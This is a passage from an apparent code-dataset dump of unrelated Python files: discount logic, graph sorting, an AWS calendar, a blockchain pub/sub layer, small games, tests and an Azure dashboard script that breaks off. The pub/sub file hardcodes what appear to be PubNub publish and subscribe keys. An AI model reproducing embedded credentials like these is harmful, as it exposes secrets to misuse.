customer.discount_group\n return {\n 'discount_group' : discount_group,\n }\n \n\n@link(namespace=modules.store.namespace)\ndef make_purchase(request, purchase, **kwargs):\n if modules.discount.user_discount_enabled:\n customer = modules.customer.get_customer(request=request)\n if customer and customer.is_authenticated():\n purchase.discount_group = customer.discount_group\n purchase.calculate(save=False)\n return {\n 'purchase': purchase\n }\n\n\n@link()\ndef get_price(price, product=None, discount_group=None, raw=False, **kwargs):\n if raw:\n return\n \n discount = None\n if product:\n try:\n discount = modules.discount.Discount.objects.polymorphic()\n if modules.discount.user_discount_enabled:\n q = Q(groups=None)\n if discount_group:\n q |= Q(groups=discount_group)\n discount = discount.filter(q)\n discount = discount.get_best_for_product(product)\n except modules.discount.Discount.DoesNotExist:\n discount = None\n\n if discount:\n price = discount.apply(price)\n\n return {\n 'price': price\n }\n","repo_name":"leotop/django-sellmo","sub_path":"sellmo/contrib/discount/links.py","file_name":"links.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19931970301","text":"from sys import stdin, setrecursionlimit as srl\nfrom threading import stack_size, Thread\n\nsrl(int(1e9)+7)\nstack_size(int(1e8))\nip=stdin.readline\n\ndef main():\n\tn, m=map(int, input('Enter No. of nodes and edges: ').split())\n\tprint('Enter edges for Directed Acyclic Graph')\n\tadj=[[] for _ in range(n+1)]\n\twhile m:\n\t\tm-=1\n\t\tx,y=map(int, ip().split())\n\t\tadj[x].append(y)\n\t\n\tvisited=[0]*(n+1)\n\tstk=[]\n\tfor x in range(1, n+1):\n\t\tdef topsort(v):\n\t\t\tif visited[v]: return\n\t\t\tvisited[v]=1\n\t\t\tfor i in adj[v]:\n\t\t\t\ttopsort(i)\n\t\t\tstk.append(v)\n\t\tif not visited[x]: topsort(x)\n\t\t\n\tprint(*stk[::-1])\n\t\nThread(target=main).start()\n","repo_name":"Aatmsaat/competitive-programming-base","sub_path":"Topological sort.py","file_name":"Topological sort.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18529864373","text":"import boto3\n\nfrom chalicelib.cob.exceptions import CalendarException\nfrom chalicelib.env import get_env_vars\n\n\nclass T24Calendar:\n # Note: singleton is not enforced\n _instance = None\n\n @classmethod\n def get_instance(cls):\n if cls._instance is None:\n cls._instance = T24Calendar()\n return cls._instance\n\n def __init__(self) -> None:\n dynamodb_client = boto3.resource(\"dynamodb\")\n self._table = dynamodb_client.Table(get_env_vars().f_holiday_table)\n self._fetched_years = {}\n\n def get_previous_cob_date(self, cob_date: str):\n self._prepare_workday(cob_date)\n\n if cob_date not in self._prev_date:\n raise CalendarException(f\"{cob_date} is not a working day\")\n\n return self._prev_date[cob_date]\n\n def _prepare_workday(self, cob_date: str):\n year = int(cob_date[:4])\n if year not in self._fetched_years:\n self._fetch_year(year)\n self._fetch_year(year - 1)\n # re-populate prev dates\n self._prev_date = {}\n self._workday_dates = []\n for _, v in sorted(self._fetched_years.items()):\n self._workday_dates += v\n for i in range(len(self._workday_dates) - 1):\n self._prev_date[self._workday_dates[i + 1]] = self._workday_dates[i]\n\n def _fetch_year(self, year: int):\n if year not in self._fetched_years:\n self._fetched_years[year] = self._table.get_item(Key={\"Source\": \"f_holiday\", \"Key\": str(year)}).get(\n \"Item\", {\"workdays\": []}\n )[\"workdays\"]","repo_name":"ducpham4010/aws-reference-code","sub_path":"tcb-etl-framework/orchestration-cloud/chalicelib/cob/models/t24_calendar.py","file_name":"t24_calendar.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"764832594","text":"\"\"\"\nOnce a block is added to the blockchain, that block should be shared with\nall the other miners in the network; so that they can the new block to their\nlocal blockchain instance\n\"\"\"\n\nimport time\n\nfrom pubnub.pubnub import PubNub\nfrom pubnub.pnconfiguration import PNConfiguration\nfrom pubnub.callbacks import SubscribeCallback\n\nfrom server.blockchain.block import Block\nfrom server.wallet.transaction import Transaction\n\npnconfig = PNConfiguration()\npnconfig.subscribe_key = 'sub-c-a62ebcde-ed5a-11eb-b0cf-7e76ce3f98e8'\npnconfig.publish_key = 'pub-c-1cb48536-63ff-457a-b690-e21d4989dc31'\n\n\"\"\"\nTo execute the pubsub, we need:\n 1. publisher\n 2. subscriber\n 3. channel\n\"\"\"\n\nCHANNELS = {\n 'TEST': 'TEST',\n 'BLOCK': 'BLOCK',\n 'TRANSACTION': 'TRANSACTION'\n}\n\nclass Listener(SubscribeCallback):\n \"\"\"\n To handle the subscriber once it receives the message\n \"\"\"\n def __init__(self, blockchain, transaction_pool):\n self.blockchain = blockchain\n self.transaction_pool = transaction_pool\n\n #newly added block is inside the message\n #need to validate it once the node recives the message\n def message(self, pubnub, message_object):\n print(f'\\n-- Channel: {message_object.channel} | Message: {message_object.message}\\n')\n\n if message_object.channel == CHANNELS['BLOCK']:\n block = Block.from_json(message_object.message)\n potential_chain = self.blockchain.chain[:]\n potential_chain.append(block)\n\n try:\n self.blockchain.replace_chain(potential_chain)\n self.transaction_pool.clear_blockchain_transactions(\n self.blockchain\n )\n print('\\n --Successfully replaced chain')\n except Exception as e:\n print(f'\\n -- Did not replace chain: {e}')\n\n elif message_object.channel == CHANNELS['TRANSACTION']:\n transaction = Transaction.from_json(message_object.message)\n self.transaction_pool.set_transaction(transaction)\n print('\\n -- Set the new transaction in the transaction pool')\n\nclass PubSub():\n \"\"\"\n Handles the publish/subscribe layer of the application.\n Provides communication between the nodes of the blockchain network\n \"\"\"\n def __init__(self, blockchain, transaction_pool):\n self.pubnub = PubNub(pnconfig)\n self.pubnub.subscribe().channels(CHANNELS.values()).execute()\n self.pubnub.add_listener(Listener(blockchain, transaction_pool))\n\n def publish(self, channel, message):\n \"\"\"\n Publish the message object to the channel.\n \"\"\"\n self.pubnub.publish().channel(channel).message(message).sync()\n\n def broadcast_block(self, block):\n \"\"\"\n Broadcast a block object to all nodes.\n \"\"\"\n self.publish(CHANNELS['BLOCK'], block.to_json())\n\n def broadcast_transaction(self, transaction):\n \"\"\"\n Broadcast a transaction to all nodes.\n \"\"\"\n self.publish(CHANNELS['TRANSACTION'], transaction.to_json())\n\ndef main():\n pubsub = PubSub()\n time.sleep(1)\n pubsub.publish(CHANNELS['TEST'], {'foo': 'bar'})\n\nif __name__ =='__main__':\n main()\n","repo_name":"nicholaas2cheung/cryptocurrency-starter","sub_path":"server/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73920995972","text":"import os\nimport sys\nfrom collections import Counter\nfrom itertools import chain\n\n\nif __name__ == '__main__':\n with open(os.path.join(sys.path[0], \"input.txt\")) as f:\n input_list = f.read().splitlines()\n input_list = [list(x) for x in input_list]\n print(input_list)\n\n container = [input_list]\n while True:\n curr_list = container[-1]\n out = []\n for i, row in enumerate(curr_list):\n out_r = []\n for j, seat in enumerate(row):\n if seat != \".\":\n left = \"-\" if j == 0 else curr_list[i][j-1]\n right = \"-\" if j == len(row) - 1 else curr_list[i][j+1]\n up = \"-\" if i == 0 else curr_list[i - 1][j]\n down = \"-\" if i == len(curr_list) - 1 else curr_list[i+1][j]\n up_left = \"-\" if i == 0 or j == 0 else curr_list[i-1][j-1]\n up_right = \"-\" if i == 0 or j == len(row) - 1 else curr_list[i-1][j+1]\n down_left = \"-\" if i == len(curr_list) - 1 or j == 0 else curr_list[i+1][j-1]\n down_right = \"-\" if i == len(curr_list) - 1 or j == len(row) - 1 else curr_list[i+1][j+1]\n seats_around = Counter(\n [left, right, up, down, up_left, up_right, down_left,\n down_right]\n )\n if seat == \"L\" and seats_around[\"#\"] == 0:\n out_r.append('#')\n elif seat == \"#\" and seats_around[\"#\"] >= 4:\n out_r.append('L')\n else:\n out_r.append(seat)\n else:\n out_r.append(seat)\n\n out.append(out_r)\n container.append(out)\n if len(container) >= 2:\n if container[-1] == container[-2]:\n break\n print(container[-1])\n final_seating = chain.from_iterable(container[-1])\n f_s = Counter(''.join(f) for f in final_seating)\n res = f_s[\"#\"]\n print(res)\n","repo_name":"drealfemo/aoc_2020","sub_path":"day_11/day_eleven.py","file_name":"day_eleven.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"10163297081","text":"import os\n\nimport pytest\n\nfrom unstructured.documents.elements import NarrativeText, Title\nfrom unstructured.staging import label_box\n\n\n@pytest.fixture()\ndef elements():\n return [Title(text=\"Title 1\"), NarrativeText(text=\"Narrative 1\")]\n\n\n@pytest.fixture()\ndef output_directory(tmp_path):\n return str(tmp_path)\n\n\n@pytest.fixture()\ndef nonexistent_output_directory(tmp_path):\n return os.path.join(str(tmp_path), \"nonexistent_dir\")\n\n\n@pytest.fixture()\ndef url_prefix():\n return \"https://storage.googleapis.com/labelbox-sample-datasets/nlp\"\n\n\n@pytest.mark.parametrize(\n (\"attachments\", \"raises_error\"),\n [\n (\n [\n {\"type\": \"RAW_TEXT\", \"value\": \"Description Text\"},\n {\"type\": \"IMAGE\", \"value\": \"Image label\", \"ignored_value\": 123},\n ],\n False,\n ),\n ([{\"type\": \"INVALID_TYPE\", \"value\": \"Description Text\"}], True),\n ([{\"type\": \"RAW_TEXT\", \"value\": 1}], True),\n ([{\"type\": \"RAW_TEXT\"}], True),\n ([{\"value\": \"My text label\"}], True),\n ],\n)\ndef test_validate_attachments(attachments, raises_error):\n if raises_error:\n with pytest.raises(ValueError):\n label_box._validate_attachments(attachments, 0)\n else:\n label_box._validate_attachments(attachments, 0)\n\n\nattachment = {\"type\": \"RAW_TEXT\", \"value\": \"Text description.\"}\n\n\n@pytest.mark.parametrize(\n (\n (\n \"external_ids\",\n \"attachments\",\n \"output_directory_fixture\",\n \"create_directory\",\n \"raises\",\n \"exception_class\",\n )\n ),\n [\n (None, None, \"output_directory\", True, False, None),\n ([\"id1\", \"id2\"], None, \"output_directory\", True, False, None),\n ([\"id1\"], None, \"output_directory\", True, True, ValueError),\n (None, [[attachment], [attachment]], \"output_directory\", True, False, None),\n (None, [[attachment]], \"output_directory\", True, True, ValueError),\n ([\"id1\", \"id2\"], [[attachment] * 2, [attachment]], \"output_directory\", True, False, None),\n (\n [\"id1\", \"id2\"],\n [[attachment] * 2, [attachment]],\n \"nonexistent_output_directory\",\n True,\n False,\n None,\n ),\n (\n [\"id1\", \"id2\"],\n [[attachment] * 2, [attachment]],\n \"nonexistent_output_directory\",\n False,\n True,\n FileNotFoundError,\n ),\n ],\n)\ndef test_stage_for_label_box(\n elements,\n url_prefix,\n external_ids,\n attachments,\n output_directory_fixture,\n create_directory,\n raises,\n exception_class,\n request,\n):\n output_directory = request.getfixturevalue(output_directory_fixture)\n if raises:\n with pytest.raises(exception_class):\n label_box.stage_for_label_box(\n elements,\n output_directory,\n url_prefix,\n external_ids=external_ids,\n attachments=attachments,\n create_directory=create_directory,\n )\n else:\n config = label_box.stage_for_label_box(\n elements,\n output_directory,\n url_prefix,\n external_ids=external_ids,\n attachments=attachments,\n create_directory=create_directory,\n )\n assert len(config) == len(elements)\n for index, (element_config, element) in enumerate(zip(config, elements)):\n print(element_config)\n\n if external_ids:\n assert element_config[\"externalId\"] == external_ids[index]\n else:\n assert element_config[\"externalId\"] == element.id\n\n if attachments:\n assert element_config[\"attachments\"] == [\n {\"type\": attachment[\"type\"], \"value\": attachment[\"value\"]}\n for attachment in attachments[index]\n ]\n\n assert element_config[\"data\"].startswith(url_prefix)\n assert element_config[\"data\"].endswith(f'{element_config[\"externalId\"]}.txt')\n\n output_filepath = os.path.join(output_directory, f'{element_config[\"externalId\"]}.txt')\n with open(output_filepath) as data_file:\n assert data_file.read().strip() == element.text.strip()\n","repo_name":"Unstructured-IO/unstructured","sub_path":"test_unstructured/staging/test_label_box.py","file_name":"test_label_box.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","stars":3375,"dataset":"github-code","pt":"44"} +{"seq_id":"11692707516","text":"from Game import Game\nfrom Renderable import Renderable\nfrom Player import Player\nfrom pygame import *\nimport random\n\nclass LightBike(Player):\n def __init__(self, *args, **kwargs):\n Player.__init__(self, *args, **kwargs)\n self.cells = []\n self.dir = 1\n self.x = 40\n self.y = 30\n self.dead = False\n\n def update(self, delta, otherCells = []):\n if not self.dead:\n if self.dir == 0:\n self.y -= 1\n elif self.dir == 1:\n self.x += 1\n elif self.dir == 2:\n self.y += 1\n elif self.dir == 3:\n self.x -= 1\n if self.x < 0 or self.y < 0 or self.x >= 80 or self.y >= 60:\n self.dead = True\n if [self.x,self.y] in self.cells or [self.x,self.y] in otherCells:\n self.dead = True\n self.cells.append([self.x,self.y])\n self.addUniqueRenderable(self.x*10,self.y*10,\"blue.png\")\n\n def handleInput(self, type, input):\n if type == KEYDOWN:\n if input == K_UP:\n self.dir = 0\n if input == K_DOWN:\n self.dir = 2\n if input == K_RIGHT:\n self.dir = 1\n if input == K_LEFT:\n self.dir = 3\n\nclass TronGame(Game):\n channelClass = LightBike\n def __init__(self, *args, **kwargs):\n Game.__init__(self, *args, **kwargs)\n self.updatet = 0\n self.speed = 40\n\n def update(self, delta):\n self.updatet += delta\n\n if self.updatet>self.speed:\n self.updatet = 0\n for p in self.players:\n if p.ready:\n p.update(delta)","repo_name":"Paradxil/Tron_Multiplayer","sub_path":"TronGame.py","file_name":"TronGame.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71836436612","text":"from __future__ import print_function\n\nimport json\nimport string\nimport sys\n\ndef gen_tests(data, prefix):\n \"\"\"Creates the HTML for all test cases.\n\n Args:\n data: Parsed JSON data that was created by gen_json.py.\n prefix: Considers Jenkins jobs that start with this.\n\n Returns:\n The HTML as a list of elements along with the number of passing,\n unstable, failing, and skipped tests.\n \"\"\"\n html = ['<ul class=\"test\">']\n total_okay = 0\n total_unstable = 0\n total_failed = 0\n total_skipped = 0\n for test in sorted(data, key=string.lower):\n test_html = ['<ul class=\"suite\">']\n has_test = False\n has_failed = False\n has_unstable = False\n for suite in sorted(data[test]):\n if not suite.startswith(prefix):\n continue\n has_test = True\n num_failed = 0\n num_builds = 0\n total_time = 0\n for build in data[test][suite]:\n num_builds += 1\n if build['failed']:\n num_failed += 1\n total_time += build['time']\n avg_time = total_time / num_builds\n unit = 's'\n if avg_time > 60:\n avg_time /= 60\n unit = 'm'\n if num_failed == num_builds:\n has_failed = True\n status = 'failed'\n elif num_failed > 0:\n has_unstable = True\n status = 'unstable'\n else:\n status = 'okay'\n test_html.append('<li class=\"suite\">')\n test_html.append('<span class=\"{}\">{}/{}</span>'.format(status, str(num_builds - num_failed), str(num_builds)))\n test_html.append('<span class=\"time\">{}</span>'.format(str(int(avg_time)) + unit))\n test_html.append(suite)\n test_html.append('</li>')\n if has_failed:\n status = 'failed'\n total_failed += 1\n elif has_unstable:\n status = 'unstable'\n total_unstable += 1\n elif has_test:\n status = 'okay'\n total_okay += 1\n else:\n status = 'skipped'\n total_skipped += 1\n html.append('<li class=\"test {}\">{}'.format(status, test))\n html.extend(test_html)\n html.append('</ul>')\n html.append('</li>')\n html.append('</ul>')\n return html, total_okay, total_unstable, total_failed, total_skipped\n\ndef gen_html(data, prefix):\n \"\"\"Creates the HTML for the entire page.\n\n Args: Same as gen_tests.\n Returns: Just the list of HTML elements.\n \"\"\"\n tests_html, okay, unstable, failed, skipped = gen_tests(data, prefix)\n html = ['<html>', '<head>']\n html.append('<link rel=\"stylesheet\" type=\"text/css\" href=\"style.css\" />')\n html.append('<script src=\"script.js\"></script>')\n html.append('</head>')\n html.append('<body>')\n if len(prefix) > 0:\n html.append('<div id=\"header\">Suites starting with {}:'.format(prefix))\n else:\n html.append('<div id=\"header\">All suites:')\n html.append('<span class=\"total okay\" onclick=\"toggle(\\'okay\\');\">{}</span>'.format(str(okay)))\n html.append('<span class=\"total unstable\" onclick=\"toggle(\\'unstable\\');\">{}</span>'.format(str(unstable)))\n html.append('<span class=\"total failed\" onclick=\"toggle(\\'failed\\');\">{}</span>'.format(str(failed)))\n html.append('<span class=\"total skipped\" onclick=\"toggle(\\'skipped\\');\">{}</span>'.format(str(skipped)))\n html.append('</div>')\n html.extend(tests_html)\n html.append('</body>')\n html.append('</html>')\n return html\n\nif __name__ == '__main__':\n prefix = ''\n if len(sys.argv) == 2:\n prefix = sys.argv[1]\n with open('tests.json', 'r') as f:\n print('\\n'.join(gen_html(json.load(f), prefix)))\n","repo_name":"fabric8io/kansible","sub_path":"vendor/k8s.io/kubernetes/hack/jenkins/test-history/gen_html.py","file_name":"gen_html.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"44"} +{"seq_id":"4183198605","text":"import csv\nimport argparse\nimport re\n\n\n# 20220707-box/1093688960/1093688960.wpi\nPATTERN = re.compile(r\".+/(?P<plate_name>.+)/(?P<image_file>.+)\\.(wpi|ome\\.xml|companion\\.ome)\")\n\nparser = argparse.ArgumentParser(description=\"Build filepaths.tsv\")\nparser.add_argument(\"file\", help=\"Annotations file\")\nparser.add_argument(\"filelist\", help=\"List of image files\")\nargs = parser.parse_args()\n\nplates = []\nplate_file_map = {}\n\n# Compile a list of plate names\nwith open(args.file, mode='r', encoding='utf-8-sig') as input_file:\n csv_reader = csv.DictReader(input_file)\n for row in csv_reader:\n if not row[\"Plate\"] in plates:\n plates.append(row[\"Plate\"])\n\n# Check the list of images files to find the corresponding \"main\" file to import\nwith open(args.filelist, mode='r') as input_file:\n for line in input_file.readlines():\n m = PATTERN.match(line.strip())\n if m:\n plate_file_map[m.group(\"plate_name\")] = f\"/uod/idr/filesets/idr0139-lawson-fascin/{line.strip()}\"\n\n# Print the tsv to std out\nfor plate in plates:\n print(f\"{plate_file_map.get(plate, 'NA')}\\t{plate}\")\n","repo_name":"IDR/idr0139-lawson-fascin","sub_path":"scripts/filepaths.py","file_name":"filepaths.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41750210600","text":"from pico2d import *\nimport game_framework\nimport collision\nimport server\nimport game_world\n\nPIXEL_PER_METER = (30.0 / 0.6) # 30 pixel 60cm\nRUN_SPEED_KMPH = 15.0\nRUN_SPEED_MPM = (RUN_SPEED_KMPH * 1000.0 / 60.0)\nRUN_SPEED_MPS = (RUN_SPEED_MPM / 60.0)\nRUN_SPEED_PPS = (RUN_SPEED_MPS * PIXEL_PER_METER)\n\nTIME_PER_ACTION = 0.8\nACTION_PER_TIME = 1.0 / TIME_PER_ACTION\nFRAMES_PER_ACTION = 8\n\n# Boy Event\nTOP_DOWN, BOTTOM_DOWN, RIGHT_DOWN, LEFT_DOWN, TOP_UP, BOTTOM_UP, RIGHT_UP, LEFT_UP, Z_DOWN, Z_UP= range(10)\n\nkey_event_table = {\n (SDL_KEYDOWN, SDLK_UP): TOP_DOWN,\n (SDL_KEYDOWN, SDLK_DOWN): BOTTOM_DOWN,\n (SDL_KEYDOWN, SDLK_RIGHT): RIGHT_DOWN,\n (SDL_KEYDOWN, SDLK_LEFT): LEFT_DOWN,\n (SDL_KEYDOWN, SDLK_z): Z_DOWN,\n\n (SDL_KEYUP, SDLK_UP): TOP_UP,\n (SDL_KEYUP, SDLK_DOWN): BOTTOM_UP,\n (SDL_KEYUP, SDLK_RIGHT): RIGHT_UP,\n (SDL_KEYUP, SDLK_LEFT): LEFT_UP,\n (SDL_KEYUP, SDLK_z): Z_UP\n}\n\n# class IdleState: # 가만히 서 있을때\n# def enter(boy, event):\n# if event == RIGHT_DOWN:\n# boy.velocity_x += RUN_SPEED_PPS\n# boy.height = 4\n# elif event == LEFT_DOWN:\n# boy.velocity_x -= RUN_SPEED_PPS\n# boy.height = 5\n# elif event == TOP_DOWN:\n# boy.velocity_y += RUN_SPEED_PPS\n# boy.height = 7\n# elif event == BOTTOM_DOWN:\n# boy.velocity_y -= RUN_SPEED_PPS\n# boy.height = 6\n# elif event == RIGHT_UP:\n# boy.velocity_x -= RUN_SPEED_PPS\n# boy.height = 4\n# elif event == LEFT_UP:\n# boy.velocity_x += RUN_SPEED_PPS\n# boy.height = 5\n# elif event == TOP_UP:\n# boy.velocity_y -= RUN_SPEED_PPS\n# boy.height = 7\n# elif event == BOTTOM_UP:\n# boy.velocity_y += RUN_SPEED_PPS\n# boy.height = 6\n#\n# def exit(boy, event):\n# pass\n#\n# def do(boy):\n# boy.frame = (boy.frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 4\n#\n# def draw(boy):\n# if boy.dir_x == 0 and boy.dir_y == 0:\n# boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n# else:\n# boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n\n\nclass RunState: # 움직이는 상태\n\n def enter(boy, event):\n if event == RIGHT_DOWN:\n boy.velocity_x += RUN_SPEED_PPS\n boy.height = 10\n elif event == LEFT_DOWN:\n boy.velocity_x -= RUN_SPEED_PPS\n boy.height = 11\n elif event == TOP_DOWN:\n boy.velocity_y += RUN_SPEED_PPS\n boy.height = 8\n elif event == BOTTOM_DOWN:\n boy.velocity_y -= RUN_SPEED_PPS\n boy.height = 9\n elif event == RIGHT_UP:\n boy.velocity_x -= RUN_SPEED_PPS\n boy.height = 4\n elif event == LEFT_UP:\n boy.velocity_x += RUN_SPEED_PPS\n boy.height = 5\n elif event == TOP_UP:\n boy.velocity_y -= RUN_SPEED_PPS\n boy.height = 7\n elif event == BOTTOM_UP:\n boy.velocity_y += RUN_SPEED_PPS\n boy.height = 6\n\n\n boy.dir_x = int(boy.velocity_x)\n boy.dir_y = int(boy.velocity_y)\n\n def exit(boy, event):\n pass\n\n def do(boy):\n boy.frame = (boy.frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 6\n boy.x += boy.velocity_x * game_framework.frame_time\n boy.y += boy.velocity_y * game_framework.frame_time\n boy.x = clamp(50, boy.x, 1024-50)\n boy.y = clamp(50, boy.y, 768-50)\n\n def draw(boy):\n if boy.velocity_x > 0:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n elif boy.velocity_x < 0:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n else:\n if boy.velocity_y > 0 or boy.velocity_y < 0:\n if boy.dir_y > 0:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n else:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n else: # idle 상태\n boy.image.clip_draw((int(boy.frame) % 4) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n\nclass AttackState:\n\n def enter(boy, event):\n if event == Z_DOWN:\n boy.attack()\n if boy.dir_x == 1:\n boy.height = 1\n elif boy.dir_x == -1:\n boy.height = 2\n elif boy.dir_y == 1:\n boy.height = 0\n else:\n boy.height = 3\n else:\n boy.height = 6\n\n def get_bb(boy): # 방향에 따라 if문으로 범위 조절 지금은 아래밖에 못치니까 y값 변환\n return boy.x - 15, boy.y - 17, boy.x + 10, boy.y + 18\n\n def exit(boy, event):\n pass\n\n def do(boy):\n boy.frame = (boy.frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 3\n\n def draw(boy):\n # if boy.dir_x == 0 and boy.dir_y == 0:\n # boy.image.clip_draw(0, boy.height * 40, 31, 40, boy.x, boy.y)\n # elif boy.dir_x == 1:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n\nnext_state_table = {\n\n # IdleState: {TOP_UP: RunState, BOTTOM_UP: RunState,\n # TOP_DOWN: RunState, BOTTOM_DOWN: RunState,\n # RIGHT_UP: RunState, LEFT_UP: RunState,\n # RIGHT_DOWN: RunState, LEFT_DOWN: RunState,\n # Z_DOWN: AttackState, Z_UP: IdleState\n # },\n\n RunState: {TOP_UP: RunState, BOTTOM_UP: RunState,\n TOP_DOWN: RunState, BOTTOM_DOWN: RunState,\n RIGHT_UP: RunState, LEFT_UP: RunState,\n RIGHT_DOWN: RunState, LEFT_DOWN: RunState,\n Z_DOWN: AttackState, Z_UP: AttackState\n },\n\n AttackState: {TOP_UP: RunState, BOTTOM_UP: RunState,\n TOP_DOWN: RunState, BOTTOM_DOWN: RunState,\n RIGHT_UP: RunState, LEFT_UP: RunState,\n RIGHT_DOWN: RunState, LEFT_DOWN: RunState,\n Z_DOWN: AttackState, Z_UP: RunState\n }\n}\n\nclass Boy:\n\n def __init__(self):\n self.x, self.y = 1024//2, 768//2\n self.image = load_image('boy_sprite.png')\n self.attack_sound = load_wav('attack_sword.wav')\n self.attack_sound.set_volume(32)\n self.font = load_font('ENCR10B.TTF', 12)\n self.dir_x = 0\n self.dir_y = 0\n self.velocity_x = 0\n self.velocity_y = 0\n self.frame = 0\n self.height = 6\n self.timer = 0\n self.hp = 10000\n self.event_que = []\n self.cur_state = RunState\n self.cur_state.enter(self, None)\n self.left = False\n self.right = False\n self.top = False\n self.bottom = False\n\n def attack(self):\n self.attack_sound.play()\n\n def change_state(self, state):\n # fill here\n pass\n\n\n def add_event(self, event):\n self.event_que.insert(0, event)\n\n def update(self):\n self.cur_state.do(self)\n if len(self.event_que) > 0:\n event = self.event_que.pop()\n self.cur_state.exit(self, event)\n self.cur_state = next_state_table[self.cur_state][event]\n self.cur_state.enter(self, event)\n # for slime in server.slimes:\n # if collision.collide(server.boy, slime):\n\n def draw(self):\n self.cur_state.draw(self)\n draw_rectangle(*self.get_bb())\n self.font.draw(self.x, self.y + 50, '(Hp: %0.0f)' % self.hp, (255, 255, 0))\n\n def handle_event(self, event):\n if(event.type, event.key) in key_event_table:\n key_event = key_event_table[(event.type, event.key)]\n self.add_event((key_event))\n\n def get_bb(self):\n return self.x - 15, self.y - 17, self.x + 10, self.y + 18\n\n # def get_bb_attack(self):\n # if self.cur_state == AttackState:\n # return self.x - 20, self.y - 22, self.x + 20, self.y + 20\n # else:\n # return self.x - 15, self.y - 17, self.x + 10, self.y + 18","repo_name":"zzmyungjun/Project","sub_path":"boy.py","file_name":"boy.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42755845668","text":"import sys\nimport time\nimport json\nimport azurerm\nimport threading\nimport platform\nimport logging\nimport requests\nfrom logtail import *\nfrom unicurses import *\nfrom windows import *\nfrom datacenters import *\n\n# Load Azure app defaults\ntry:\n\twith open('asciivmssdashboard.json') as configFile:\n\t\tconfigData = json.load(configFile)\nexcept FileNotFoundError:\n\tprint(\"Error: Expecting asciivmssdashboard.json in current folder\")\n\tsys.exit()\n\ntry:\n\ttenant_id = configData['tenantId']\n\tapp_id = configData['appId']\n\tapp_secret = configData['appSecret']\n\tsubscription_id = configData['subscriptionId']\n\t# this is the resource group, VM Scale Set to monitor..\n\trgname = configData['resourceGroup']\n\tvmssname = configData['vmssName']\n\tvmsku = configData['vmSku']\n\ttier = configData['tier']\n\tpurgeLog = configData['purgeLog']\n\tlogName = configData['logName']\n\tlogLevel = configData['logLevel']\n\tinterval = configData['interval']\n\tinsightsAppId = configData['insightsAppId']\n\tinsightsKey = configData['insightsKey']\n\tinsightsUrl = configData['insightsUrl']\n\tinsightsOneEnabled = configData['insightsOneEnabled']\n\tinsightsOneUrl = configData['insightsOneUrl']\n\tinsightsOneMetric = configData['insightsOneMetric']\n\tinsightsOneTitle = configData['insightsOneTitle']\n\tinsightsTwoEnabled = configData['insightsTwoEnabled']\n\tinsightsTwoUrl = configData['insightsTwoUrl']\n\tinsightsTwoMetric = configData['insightsTwoMetric']\n\tinsightsTwoTitle = configData['insightsTwoTitle']\n\tinsightsInterval = configData['insightsInterval']\n\tconfigFile.close()\nexcept:\n\tprint(\"Missing configuration parameter. You can disable some features, but the config option must be present.\")\n\tprint(\"Use the asciivmssdashboard.json.tmpl file as a template to fill in your custom values...\")\n\tconfigFile.close()\n\tsys.exit()\n\n#Region...\nregion=\"\"\n\n#Just a high number, so we can test and see if it was not updated yet...\ncapacity=999999\n#VM\nvm_selected = [999999, 999999];\ninsights_flag = 0;\n\n#Window VM\ncountery=0\nwindow_vm = []; panel_vm = []; instances_deployed = [];\nvm_details = \"\"; vm_nic = \"\";\npage = 1;\n\n#Flag to quit...\nquit = 0;\n\n#Remove old log file if requested (default behavior)...\nif (purgeLog.lower() == \"yes\"):\n\tif (os.path.isfile(logName)):\n\t\tos.remove(logName);\n\n#Basic Logging...\n#logging.basicConfig(format='%(asctime)s - %(levelname)s:%(message)s', datefmt='%H:%M:%S', level=logLevel, filename=logName)\nlogging.basicConfig(format='%(asctime)s - %(levelname)s:%(message)s', level=logLevel, filename=logName)\n\n#Exec command...\ndef exec_cmd(window, access_token, cap, cmd):\n\tglobal subscription_id, rgname, vmssname, vmsku, tier, vm_selected, window_vm, panel_vm, vm_details, vm_nic, page, insights_flag;\n\n\t#Return codes...\n\tiniterror = 2; syntaxerror = 3; capacityerror = 4;\n\texecsuccess = 0; execerror = 1;\n\n\t#Sanity check on capacity...\n\tif (cap == \"999999\"):\n\t\treturn initerror;\n\tif not (isinstance(cap, int)):\n\t\treturn initerror;\n\n\t#Syntax check...\n\tif (len(cmd.split()) != 4 and 